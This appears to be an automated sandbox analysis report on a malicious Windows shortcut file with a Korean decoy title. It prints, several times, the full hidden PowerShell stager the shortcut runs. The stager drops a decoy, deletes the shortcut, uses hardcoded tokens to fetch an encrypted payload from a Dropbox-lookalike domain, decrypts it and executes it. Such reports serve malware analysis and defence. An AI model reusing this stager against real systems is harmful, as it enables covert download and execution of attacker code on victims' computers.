Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 20, 2024, 5:55 p.m.	Aug. 20, 2024, 5:57 p.m.

Size	1.1MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`32e828282dbe16073293dacc17f0598c`
SHA256	`6b660666f031843a36225e791f6564983c2c8cabf85d2216f0617702a978c838`
CRC32	`6C011225`
ssdeep	`1536:LCNrr8wc73ExbcrAoHXnTKZva0CfkTYcIJex+155sB:LCNrr8wc73ExbcrAUnTKUfkiH54`
Yara	HWP_file_format - HWP Document File Microsoft_Office_File_Zero - Microsoft Office File lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "vfrjvoBTejgvVag" "C:\Users\test22\AppData\Local\Temp\한중 북중 안보현안 비공개 정책간담회 계획.lnk"
2544
- cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
  2656
  - powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
    2752
    - cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
      2856
      - powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1110496;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function AESDecrypt { param ( [Byte[]]$bytes,[String]$pass=\"pa55w0rd\") $InputStream = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object System.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read($Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Security.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec, [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientID = \"oj8kd1lzqrw7v3m\";$clientSecret = \"vwp27gytekx9jfq\";$refreshToken = \"wR3_ULk2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dr0pb0xapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dr0pb0xapi.com/2/files/download\";$remoteFilePath = \"/step5/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dr0pb0x-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();$pass = \"pa55w0rd\";if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -bytes $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
        2920

Name	Response	Post-Analysis Lookup
content.dr0pb0xapi.com

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 20, 2024, 5:55 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 20, 2024, 5:55 p.m.			0	0
IsDebuggerPresent Aug. 20, 2024, 5:55 p.m.			0	0

Command line console output was observed (50 out of 22618 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: readfileend console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: exestart console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: exeend console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: The term 'Invoke-RestMethod' is not recognized as the name of a cmdlet, functio console_handle: 0x00000033	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000003f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000004b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: At line:1 char:2157 console_handle: 0x00000057	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;fo console_handle: 0x00000063	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: reach ($path in $lnkpath) { if ($path.length -eq 0x0010F27C) { $lnkpath = $path console_handle: 0x0000006f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Obje console_handle: 0x0000007b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ct System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]:: console_handle: 0x00000087	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file console_handle: 0x00000093	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ,0,$file.Length);$InputStream.Dispose();write-host "readfileend";$path = $lnkpa console_handle: 0x0000009f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: th.substring(0,$lnkpath.length-4);$path1 = 'C:\Users\test22\AppData\Local\Temp\ console_handle: 0x000000ab	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: tmp' + (Get-Random) + '.vbs';$len1 = 1057248;$len2 = 1110496;$len3 = 1 console_handle: 0x000000b7	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: 110496;$temp = New-Object Byte[]($len2-$len1);write-host "exestart";for($i=$len console_handle: 0x000000c3	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: 1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) console_handle: 0x000000cf	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: -Encoding Byte;write-host "exeend";$temp = New-Object Byte[]($file.Length-$len3 console_handle: 0x000000db	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: );for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $enc console_handle: 0x000000e7	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: Data_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Fun console_handle: 0x000000f3	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ction AESDecrypt { param ( [Byte[]]$bytes,[String]$pass="pa55w0rd") $InputStrea console_handle: 0x000000ff	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: m = New-Object System.IO.MemoryStream(,$bytes);$OutputStream = New-Object Syste console_handle: 0x0000010b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: m.IO.MemoryStream;$Salt = New-Object Byte[](32);$BytesRead = $InputStream.Read( console_handle: 0x00000117	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: $Salt, 0, $Salt.Length);if ( $BytesRead -ne $Salt.Length ) { exit;} $PBKDF2 = N console_handle: 0x00000123	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ew-Object System.Security.Cryptography.Rfc2898DeriveBytes($pass, $Salt);$AESKey console_handle: 0x0000012f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: = $PBKDF2.GetBytes(32);$AESIV = $PBKDF2.GetBytes(16);$AES = New-Object Securit console_handle: 0x0000013b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: y.Cryptography.AesManaged;$Dec = $AES.CreateDecryptor($AESKey, $AESIV);$CryptoS console_handle: 0x00000147	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: tream = New-Object System.Security.Cryptography.CryptoStream($InputStream, $Dec console_handle: 0x00000153	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: , [System.Security.Cryptography.CryptoStreamMode]::Read);$CryptoStream.CopyTo($ console_handle: 0x0000015f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: OutputStream);$OutputStream.Dispose();return $OutputStream.ToArray();} $clientI console_handle: 0x0000016b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: D = "oj8kd1lzqrw7v3m";$clientSecret = "vwp27gytekx9jfq";$refreshToken = "wR3_UL console_handle: 0x00000177	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: k2OicAAAAAAAAAAV81-_COcFPa8SN0V5K-ZPTYB-BVIH5E1c4_fqLOCC_u";$body = @{grant_typ console_handle: 0x00000183	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: e="refresh_token";refresh_token=$refreshToken;client_id=$clientID;client_secret console_handle: 0x0000018f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: =$clientSecret};$tokenEndpoint = "https://api.dr0pb0xapi.com/oauth2/token";$res console_handle: 0x0000019b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ponse = Invoke-RestMethod <<<< -Uri $tokenEndpoint -Method Post -Body $body;if console_handle: 0x000001a7	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl console_handle: 0x000001b3	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: = "https://content.dr0pb0xapi.com/2/files/download";$remoteFilePath = "/step5/p console_handle: 0x000001bf	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: s.bin";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Me console_handle: 0x000001cb	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: thod = "POST";$request.Headers.Add("Authorization", "Bearer $accessToken");$req console_handle: 0x000001d7	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: uest.Headers.Add("Dr0pb0x-API-Arg", '{"path": "' + $remoteFilePath + '"}');$res console_handle: 0x000001e3	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ponse = $request.GetResponse();$receiveStream = $response.GetResponseStream();$ console_handle: 0x000001ef	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: pass = "pa55w0rd";if ($receiveStream -ne $null) {$streamReader = New-Object Sys console_handle: 0x000001fb	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: tem.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.Memory console_handle: 0x00000207	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: Stream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.R console_handle: 0x00000213	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ead($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while console_handle: 0x0000021f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: ($read -gt 0);$enc_bytes = $memoryStream.ToArray();$dec_bytes = AESDecrypt -byt console_handle: 0x0000022b	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: es $enc_bytes -pass $pass;$newString = [System.Text.Encoding]::UTF8.GetString($ console_handle: 0x00000237	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: dec_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiv console_handle: 0x00000243	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: eStream.Close();$response.Close(); console_handle: 0x0000024f	1	1
WriteConsoleW Aug. 20, 2024, 5:55 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-RestMethod:String) [], C console_handle: 0x0000025b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 104 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485b90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485650 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00485f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 20, 2024, 5:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00486010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
